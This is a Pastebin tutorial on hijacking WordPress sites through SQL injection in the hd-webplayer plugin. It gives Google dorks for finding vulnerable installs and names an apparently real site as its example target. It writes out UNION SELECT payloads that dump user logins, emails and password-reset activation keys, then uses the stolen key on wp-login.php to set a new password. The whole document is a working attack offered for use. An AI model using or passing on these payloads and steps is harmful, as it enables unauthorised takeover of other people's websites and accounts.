Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Tutorial] Hack WordPress site with SQL injection [Tuto]
- lets begin.
- First of all we need to find a vulnerable page.
- We enter this in Google:
- Code:
- # Dork 1 (config.php)
- inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
- # Dork 2 (playlist.php)
- inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
- # Dork 3 (General):
- inurl:"/wp-content/plugins/hd-webplayer/"
- When you found your site you need to find admin email and username.
- I will be using this site for example:
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
- Image has been scaled down 10% (835x513). Click this bar to view original image (924x567). Click image to open in new window.
- [Image: regiont.png]
- When i add ' text disappears so it is vulnerable.
- Image has been scaled down 8% (835x363). Click this bar to view original image (907x394). Click image to open in new window.
- [Image: regionzn.png]
- NOTE: I will not demonstrate how to SQL inject.
- Now we need admin username and email.
- We need to inject:
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
- Now we have 2 users.
- http
- Image has been scaled down 14% (835x416). Click this bar to view original image (965x480). Click image to open in new window.
- [Image: regionjhg.png]
- We pick one and copy his email.
- Go to the login page of the site.
- It is usually here:
- Code:
- http://www.site.com/wp-login.php
- And press "Lost your password?"
- Image has been scaled down 13% (835x462). Click this bar to view original image (953x527). Click image to open in new window.
- [Image: regionz.png]
- Now you enter either username or email.
- We can enter both so it doesnt matter.
- I entered email.
- [Image: regionby.png]
- [Image: regionng.png]
- Now when you got:
- "Check your e-mail for the confirmation link."
- It means that reset key is successfully sent.
- Now we need to get the activation key.
- Go back to the syntax you used for extracting email and username and do this:
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
- Code:
- http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
- Image has been scaled down 11% (835x368). Click this bar to view original image (932x410). Click image to open in new window.
- [Image: regiongn.png]
- Voila!
- Now we just need to reset it.
- go to:
- Code:
- wp-login.php?action=rp&key=resetkey&login=username
- NOTE: Replace key= & login=
- So my link will be:
- Image has been scaled down 6% (835x115). Click this bar to view original image (886x122). Click image to open in new window.
- [Image: regionzi.png]
- Enter new password:
- [Image: thefreenudecelebritysit.png]
- [Image: regiongv.png]
- Thanks for reading! Emot-c00lbert
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement